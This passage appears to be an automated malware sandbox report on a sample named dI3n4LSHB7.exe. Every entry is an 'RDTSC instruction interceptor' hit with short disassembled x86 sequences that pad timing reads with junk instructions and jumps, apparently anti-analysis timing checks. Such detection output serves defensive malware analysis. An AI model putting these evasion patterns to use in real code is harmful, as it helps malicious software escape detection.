Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A29671 second address: A2968D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF4C0C3E166h 0x0000000a jmp 00007FF4C0C3E172h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A29C4D second address: A29C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A29C53 second address: A29C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 997684 second address: 9976A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF4C050159Eh 0x0000000a jno 00007FF4C0501596h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9976A2 second address: 9976A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A2F993 second address: A2F9A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FF4C050159Ah 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A2F9A3 second address: A2F9AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jc 00007FF4C0C3E166h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A2F9AF second address: A2F9D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007FF4C05015BBh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF4C050159Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A2F9D1 second address: A2F9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A2FB96 second address: A2FBAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF4C050159Bh 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A2FBAD second address: A2FBB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A2FFA0 second address: A2FFD4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF4C0501596h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007FF4C05015AAh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF4C050159Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A30338 second address: A30374 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF4C0C3E166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FF4C0C3E179h 0x00000010 jnl 00007FF4C0C3E166h 0x00000016 jns 00007FF4C0C3E166h 0x0000001c popad 0x0000001d jns 00007FF4C0C3E168h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A30374 second address: A3037A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A30C71 second address: A30C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A30C77 second address: A30C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FF4C05015A1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A30C92 second address: A30C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A30C98 second address: A30C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A30C9C second address: A30CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A30CA2 second address: A30CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A30F61 second address: A30F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A30F69 second address: A30F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A30F6D second address: A30F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E176h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A314E1 second address: A314E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A314E7 second address: A314EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A314EC second address: A31524 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FF4C05015A6h 0x00000008 jng 00007FF4C0501596h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 jmp 00007FF4C05015A1h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A31524 second address: A3152E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF4C0C3E166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A35988 second address: A3598C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A3598C second address: A35990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A35AFC second address: A35B17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FF4C0501596h 0x00000009 jno 00007FF4C0501596h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A35B17 second address: A35B21 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF4C0C3E166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A35B21 second address: A35B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF4C05015A2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A35B2F second address: A35B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A35C7A second address: A35C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A35DF3 second address: A35DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A35DF9 second address: A35DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A35DFE second address: A35E2E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FF4C0C3E175h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edi 0x0000000b push esi 0x0000000c jmp 00007FF4C0C3E172h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A35E2E second address: A35E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 pushad 0x00000009 jmp 00007FF4C05015A9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A36554 second address: A36559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A36559 second address: A36563 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF4C050159Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A36563 second address: A3656B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A3656B second address: A36575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF4C0501596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A36575 second address: A36595 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnp 00007FF4C0C3E172h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A36595 second address: A365A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A4313B second address: A43140 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A43140 second address: A43146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A432AD second address: A432B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A432B1 second address: A432BB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF4C0501596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A432BB second address: A432C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A43418 second address: A43422 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF4C0501596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A43422 second address: A43430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FF4C0C3E166h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A43430 second address: A43440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C050159Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A43440 second address: A43445 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A43445 second address: A4345B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FF4C050159Bh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A435F2 second address: A435FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF4C0C3E166h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A435FD second address: A4361F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FF4C05015A8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A43762 second address: A43773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jbe 00007FF4C0C3E166h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A43773 second address: A43777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A43A67 second address: A43A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A44988 second address: A4498C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A4498C second address: A449A2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF4C0C3E166h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FF4C0C3E16Eh 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A449A2 second address: A449A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A449A6 second address: A449E2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF4C0C3E177h 0x00000008 jng 00007FF4C0C3E168h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 jc 00007FF4C0C3E17Ch 0x00000017 jmp 00007FF4C0C3E170h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A4D64D second address: A4D655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A4D655 second address: A4D671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 popad 0x00000008 jo 00007FF4C0C3E194h 0x0000000e je 00007FF4C0C3E172h 0x00000014 ja 00007FF4C0C3E166h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A53D38 second address: A53D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4C05015A8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A53D54 second address: A53D7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jne 00007FF4C0C3E172h 0x0000000e push ebx 0x0000000f jc 00007FF4C0C3E166h 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A5BC69 second address: A5BC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4C05015A1h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A5B76D second address: A5B792 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E178h 0x00000007 jnc 00007FF4C0C3E166h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A5B792 second address: A5B7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF4C0501596h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A5F74A second address: A5F751 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A5F751 second address: A5F757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A5F434 second address: A5F438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A5F438 second address: A5F43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A6593C second address: A65940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A6A43E second address: A6A453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF4C0501596h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jc 00007FF4C050159Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A6FD48 second address: A6FD4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A747C9 second address: A747F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4C05015A5h 0x00000009 popad 0x0000000a jmp 00007FF4C050159Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A780F6 second address: A780FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99411C second address: 994120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A7EC27 second address: A7EC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4C0C3E177h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A7EC42 second address: A7EC46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A7EC46 second address: A7EC51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A7EC51 second address: A7EC59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A7D64A second address: A7D64E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A7D8D6 second address: A7D8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A7D8DA second address: A7D8E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A7DB43 second address: A7DB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF4C0501596h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A7DB52 second address: A7DB7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E178h 0x00000007 pushad 0x00000008 jp 00007FF4C0C3E166h 0x0000000e jp 00007FF4C0C3E166h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A7DCBB second address: A7DCC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A81580 second address: A8158B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF4C0C3E166h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A8DB3B second address: A8DB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A8DB40 second address: A8DB62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E170h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FF4C0C3E18Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007FF4C0C3E166h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A8DB62 second address: A8DB74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C050159Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A8DB74 second address: A8DB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A92421 second address: A92426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A92426 second address: A92430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FF4C0C3E166h 0x0000000a rdtsc
